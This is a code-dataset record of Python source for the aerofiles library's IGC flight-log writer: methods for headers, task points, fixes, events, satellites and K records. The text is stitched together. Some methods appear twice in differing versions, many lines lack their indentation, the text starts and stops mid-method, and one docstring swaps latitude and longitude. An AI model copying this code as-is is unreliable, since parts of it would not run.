self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_point(self, latitude=None, longitude=None, text='',
                     distance_min=None, distance_max=None,
                     bearing1=None, bearing2=None):
    """
    Write a task declaration (C) point::

        writer.write_task_point(
            latitude=(51 + 7.345 / 60.),
            longitude=(6 + 24.765 / 60.),
            text='Meiersberg',
        )
        # -> C5107345N00624765EMeiersberg

    When ``latitude`` or ``longitude`` is omitted the coordinate fields
    are zero-filled ("unknown"); that should only be used for the
    ``TAKEOFF`` and ``LANDING`` points. For area tasks all four of
    ``distance_min``, ``distance_max``, ``bearing1`` and ``bearing2``
    must be given; each is encoded as a four- or three-digit integer
    part followed by three fractional digits (thousandths).

    :param latitude: latitude of the point (-90 to 90 degrees)
    :param longitude: longitude of the point (-180 to 180 degrees)
    :param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
        ``START``, ``TURN 1``, ``FINISH`` or ``LANDING``)
    :param distance_min: inner radius of the area (km)
    :param distance_max: outer radius of the area (km)
    :param bearing1: first bearing limit of the area (degrees)
    :param bearing2: second bearing limit of the area (degrees)
    """
    record = self.format_latitude(latitude) + self.format_longitude(longitude)
    area = (distance_min, distance_max, bearing1, bearing2)
    if None not in area:
        # Distances use a 4-digit integer part, bearings a 3-digit one;
        # both are followed by three fractional digits.
        for value, width in zip(area, (4, 4, 3, 3)):
            whole = int(value)
            record += '%0*d' % (width, whole)
            record += '%03d' % int((value - whole) * 1000)
    if text:
        record += text
    self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
    """
    Write an event (E) record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')
    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    # Two arguments: distinguish (time, code) from (code, text) by the
    # type of the first argument.
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        time, code = args
        text = None
    else:
        code, text = args
        time = None
    if time is None:
        time = datetime.datetime.utcnow()
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')
    record = self.format_time(time)
    record += code
    if text:
        record += text
    self.write_record('E', record)
def write_satellites(self, *args):
    """
    Write a satellite constellation (F) record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record
        (default: :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')
    if time is None:
        time = datetime.datetime.utcnow()
    record = self.format_time(time)
    for sat in satellites:
        # Integer IDs are zero-padded; string IDs must already be
        # exactly two characters long.
        sat_id = '%02d' % sat if isinstance(sat, int) else sat
        if len(sat_id) != 2:
            raise ValueError('Invalid satellite ID')
        record += sat_id
    self.write_record('F', record)
def write_k_record(self, *args):
    """
    Write a K record carrying previously declared extension values::

        writer.write_k_record_extensions([
            ('FXA', 3), ('SIU', 2), ('ENL', 3),
        ])
        writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
        # -> J030810FXA1112SIU1315ENL
        # -> K02030402313002

    :param time: UTC time of the K record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
    """
    if len(args) == 1:
        time, extensions = None, args[0]
    elif len(args) == 2:
        time, extensions = args
    else:
        raise ValueError('Invalid number of parameters received')
    if time is None:
        time = datetime.datetime.utcnow()
    record = self.format_time(time)
    # Values must line up one-to-one with the declared (code, length)
    # pairs; numbers are zero-padded to the declared field width.
    if not (isinstance(extensions, list) and
            isinstance(self.k_record_extensions, list)):
        raise ValueError('Invalid extensions list')
    if len(extensions) != len(self.k_record_extensions):
        raise ValueError(
            'Number of extensions does not match declaration')
    for (_, length), value in zip(self.k_record_extensions, extensions):
        if isinstance(value, (int, float)):
            value = ('%0' + str(length) + 'd') % value
        if len(value) != length:
            raise ValueError('Extension value has wrong length')
        record += value
    self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment (L) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the
        comment (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    :raises ValueError: if ``code`` is not a valid three-letter-code
    """
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid source')
    self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_point | python | def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record) | Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L552-L607 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def write_record(self, type, record):\n self.wr... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
    """Normalize ``date`` to the IGC ``DDMMYY`` string and validate it.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.date` or a
    pre-formatted string; raises :class:`ValueError` when the result
    does not match the expected six-digit pattern.
    """
    if isinstance(date, datetime.datetime):
        date = date.date()
    if isinstance(date, datetime.date):
        date = date.strftime('%d%m%y')
    if not patterns.DATE.match(date):
        raise ValueError("Invalid date: " + date)
    return date
def format_time(self, time):
    """Normalize ``time`` to the IGC ``HHMMSS`` string and validate it.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.time` or a
    pre-formatted string; raises :class:`ValueError` when the result
    does not match the expected six-digit pattern.
    """
    if isinstance(time, datetime.datetime):
        time = time.time()
    if isinstance(time, datetime.time):
        time = time.strftime('%H%M%S')
    if not patterns.TIME.match(time):
        raise ValueError("Invalid time: " + time)
    return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
    """Write one IGC record: single-letter ``type`` prefix plus payload."""
    self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
    """
    Write the date header::

        writer.write_date(datetime.date(2014, 5, 2))
        # -> HFDTE020514

    The date is encoded as ``DDMMYY`` per the IGC specification.

    :param date: a :class:`datetime.date` instance
    """
    self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
    """
    Write all the necessary headers in the correct order::

        writer.write_headers({
            'manufacturer_code': 'XCS',
            'logger_id': 'TBX',
            'date': datetime.date(1987, 2, 24),
            'fix_accuracy': 50,
            'pilot': 'Tobias Bieniek',
            'copilot': 'John Doe',
            'glider_type': 'Duo Discus',
            'glider_id': 'D-KKHH',
            'firmware_version': '2.2',
            'hardware_version': '2',
            'logger_type': 'LXNAVIGATION,LX8000F',
            'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
            'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
            'competition_id': '2H',
            'competition_class': 'Doubleseater',
        })
        # -> AXCSTBX
        # -> HFDTE240287
        # -> HFFXA050
        # -> HFPLTPILOTINCHARGE:Tobias Bieniek
        # -> HFCM2CREW2:John Doe
        # -> HFGTYGLIDERTYPE:Duo Discus
        # -> HFGIDGLIDERID:D-KKHH
        # -> HFDTM100GPSDATUM:WGS-1984
        # -> HFRFWFIRMWAREVERSION:2.2
        # -> HFRHWHARDWAREVERSION:2
        # -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
        # -> HFGPSuBLOX LEA-4S-2,16,max9000m
        # -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
        # -> HFCIDCOMPETITIONID:2H
        # -> HFCCLCOMPETITIONCLASS:Doubleseater

    This method will throw a :class:`ValueError` if a mandatory header
    is missing and will fill others up with empty strings if no value
    was given. The optional headers are only written if they are part
    of the specified :class:`dict`.

    .. admonition:: Note

        The use of this method is encouraged compared to calling all
        the other header-writing methods manually!

    :param headers: a :class:`dict` of all the headers that should be
        written.
    """
    # Fail fast before emitting anything if a mandatory key is absent.
    for header in self.REQUIRED_HEADERS:
        if header not in headers:
            raise ValueError('%s header missing' % header)
    self.write_logger_id(
        headers['manufacturer_code'],
        headers['logger_id'],
        extension=headers.get('logger_id_extension')
    )
    self.write_date(headers['date'])
    self.write_fix_accuracy(headers.get('fix_accuracy'))
    self.write_pilot(headers.get('pilot', ''))
    # Optional headers are skipped entirely when absent rather than
    # written with empty values.
    if 'copilot' in headers:
        self.write_copilot(headers['copilot'])
    self.write_glider_type(headers.get('glider_type', ''))
    self.write_glider_id(headers.get('glider_id', ''))
    self.write_gps_datum(
        code=headers.get('gps_datum_code'),
        gps_datum=headers.get('gps_datum'),
    )
    self.write_firmware_version(headers.get('firmware_version', ''))
    self.write_hardware_version(headers.get('hardware_version', ''))
    self.write_logger_type(headers['logger_type'])
    self.write_gps_receiver(headers['gps_receiver'])
    self.write_pressure_sensor(headers.get('pressure_sensor', ''))
    if 'competition_id' in headers:
        self.write_competition_id(headers['competition_id'])
    if 'competition_class' in headers:
        self.write_competition_class(headers['competition_class'])
    if 'club' in headers:
        self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
    """Write an extensions declaration ('I' or 'J') record.

    :param type: record type letter (``'I'`` for fix extensions,
        ``'J'`` for K record extensions)
    :param start_byte: one-based byte offset of the first extension
        value in the target record
    :param extensions: a list of ``(extension, length)`` tuples
    :raises ValueError: for more than 99 extensions, an invalid
        extension code, or extensions that run past byte 99
    """
    num_extensions = len(extensions)
    if num_extensions >= 100:
        raise ValueError('Too many extensions')
    record = '%02d' % num_extensions
    for extension, length in extensions:
        if not patterns.EXTENSION_CODE.match(extension):
            raise ValueError('Invalid extension: %s' % extension)
        end_byte = start_byte + length - 1
        # Byte addresses are fixed two-digit fields in the IGC format;
        # larger values would silently corrupt the record layout.
        if end_byte > 99:
            raise ValueError('Extensions exceed maximum record length')
        record += '%02d%02d%s' % (start_byte, end_byte, extension)
        start_byte = start_byte + length
    self.write_record(type, record)
def write_fix_extensions(self, extensions):
    """
    Write the fix extensions description (I) record::

        writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
        # -> I033638FXA3940SIU4143ENL

    The declaration is remembered so that
    :meth:`~aerofiles.igc.Writer.write_fix` can validate and pad the
    extension values passed to it.

    :param extensions: a list of ``(extension, length)`` tuples
    """
    self.fix_extensions = extensions
    # Fix extension values start at byte 36, right after the base
    # B record fields.
    self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
    """
    Write the K record extensions description (J) record::

        writer.write_k_record_extensions([('HDT', 5)])
        # -> J010812HDT

    Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
    associated records.

    :param extensions: a list of ``(extension, length)`` tuples
    """
    self.k_record_extensions = extensions
    # K record extension values start at byte 8, after 'K' + HHMMSS.
    self.write_extensions('J', 8, extensions)
def write_task_metadata(
        self, declaration_datetime=None, flight_date=None,
        task_number=None, turnpoints=None, text=None):
    """
    Write the task declaration metadata (first C) record::

        writer.write_task_metadata(
            datetime.datetime(2014, 4, 13, 12, 53, 2),
            task_number=42,
            turnpoints=3,
        )
        # -> C140413125302000000004203

    Sensible defaults exist for every parameter except ``turnpoints``,
    which is required and raises :class:`ValueError` when missing.

    :param declaration_datetime: UTC declaration timestamp as a
        :class:`datetime.datetime` or pre-formatted string
        (default: current UTC date and time)
    :param flight_date: intended flight date as a
        :class:`datetime.date` (default: ``000000``, meaning "use
        declaration date")
    :param task_number: task number for the flight date or an
        integer-based identifier (default: ``0001``)
    :param turnpoints: the number of turnpoints in the task (not
        counting start and finish points!)
    :param text: optional text to append to the metadata record
    """
    if declaration_datetime is None:
        declaration_datetime = datetime.datetime.utcnow()
    if isinstance(declaration_datetime, datetime.datetime):
        declaration_datetime = (
            self.format_date(declaration_datetime) +
            self.format_time(declaration_datetime)
        )
    elif not patterns.DATETIME.match(declaration_datetime):
        raise ValueError('Invalid declaration datetime: %s' %
                         declaration_datetime)
    flight_date = (
        '000000' if flight_date is None else self.format_date(flight_date))
    if task_number is None:
        task_number = 1
    elif not isinstance(task_number, int):
        raise ValueError('Invalid task number: %s' % task_number)
    if not isinstance(turnpoints, int):
        raise ValueError('Invalid turnpoints: %s' % turnpoints)
    record = '%s%s%04d%02d' % (
        declaration_datetime, flight_date, task_number, turnpoints)
    if text:
        record += text
    self.write_record('C', record)
def write_task_points(self, points):
    """
    Write multiple task declaration points with one call::

        writer.write_task_points([
            (None, None, 'TAKEOFF'),
            (51.40375, 6.41275, 'START'),
            (50.38210, 8.82105, 'TURN 1'),
            (50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
            (51.40375, 6.41275, 'FINISH'),
            (None, None, 'LANDING'),
        ])
        # -> C0000000N00000000ETAKEOFF
        # -> C5124225N00624765ESTART
        # -> C5022926N00849263ETURN 1
        # -> C5035427N00702133E00000000032500000000180000TURN 2
        # -> C5124225N00624765EFINISH
        # -> C0000000N00000000ELANDING

    See :meth:`~aerofiles.igc.Writer.write_task_point` for details.

    :param points: a list of ``(latitude, longitude, text)`` tuples;
        use ``(latitude, longitude, text, distance_min, distance_max,
        bearing1, bearing2)`` tuples for area task points.
    """
    for point in points:
        # Regular points have 3 items, area points 7.
        if len(point) not in (3, 7):
            raise ValueError('Invalid number of task point tuple items')
        self.write_task_point(*point)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
              pressure_alt=None, gps_alt=None, extensions=None):
    """
    Write a B (fix) record::

        writer.write_fix(
            datetime.time(12, 34, 56),
            latitude=51.40375,
            longitude=6.41275,
            valid=True,
            pressure_alt=1234,
            gps_alt=1432,
        )
        # -> B1234565124225N00624765EA0123401432

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param latitude: latitude of the last GPS fix
    :param longitude: longitude of the last GPS fix
    :param valid: ``True`` if the current GPS fix is 3D
    :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
        sea level datum
    :param gps_alt: altitude above the WGS84 ellipsoid
    :param extensions: a list of extension values matching the earlier
        :meth:`~aerofiles.igc.Writer.write_fix_extensions` declaration
    """
    if time is None:
        time = datetime.datetime.utcnow()

    # fixed-width mandatory fields, in record order
    parts = [
        self.format_time(time),
        self.format_latitude(latitude),
        self.format_longitude(longitude),
        'A' if valid else 'V',
        '%05d' % (pressure_alt or 0),
        '%05d' % (gps_alt or 0),
    ]

    if extensions or self.fix_extensions:
        # extension values may only be given together with a declaration
        if not (isinstance(extensions, list) and
                isinstance(self.fix_extensions, list)):
            raise ValueError('Invalid extensions list')

        if len(extensions) != len(self.fix_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')

        for (_, length), value in zip(self.fix_extensions, extensions):
            # numbers are zero-padded to the declared field width
            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value

            if len(value) != length:
                raise ValueError('Extension value has wrong length')

            parts.append(value)

    self.write_record('B', ''.join(parts))
def write_event(self, *args):
    """
    Write an E (event) record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    time = code = text = None

    if len(args) == 3:
        time, code, text = args
    elif len(args) == 2:
        # two arguments are either (time, code) or (code, text)
        if isinstance(args[0], (datetime.time, datetime.datetime)):
            time, code = args
        else:
            code, text = args
    elif len(args) == 1:
        code, = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    self.write_record('E', self.format_time(time) + code + (text or ''))
def write_satellites(self, *args):
    """
    Write an F (satellite constellation) record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)
    for satellite in satellites:
        # integer IDs are zero-padded to the two-character field width
        if isinstance(satellite, int):
            satellite = '%02d' % satellite
        if len(satellite) != 2:
            raise ValueError('Invalid satellite ID')
        record += satellite

    self.write_record('F', record)
def write_k_record(self, *args):
    """
    Write a K record::

        writer.write_k_record_extensions([
            ('FXA', 3), ('SIU', 2), ('ENL', 3),
        ])
        writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
        # -> J030810FXA1112SIU1315ENL
        # -> K02030402313002

    :param time: UTC time of the k record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param extensions: a list of extension values matching the earlier
        :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
        declaration
    """
    if len(args) == 1:
        time, extensions = None, args[0]
    elif len(args) == 2:
        time, extensions = args
    else:
